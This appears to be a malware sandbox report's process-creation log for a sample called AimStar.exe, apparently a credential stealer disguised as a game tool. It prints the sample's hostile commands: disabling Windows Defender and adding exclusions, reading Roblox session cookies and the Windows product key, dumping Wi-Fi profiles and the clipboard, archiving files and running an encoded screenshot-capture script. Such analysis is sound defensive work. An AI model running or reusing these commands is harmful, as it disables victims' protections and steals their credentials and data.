              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Users\user\Desktop\AimStar.exe "C:\Users\user\Desktop\AimStar.exe"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
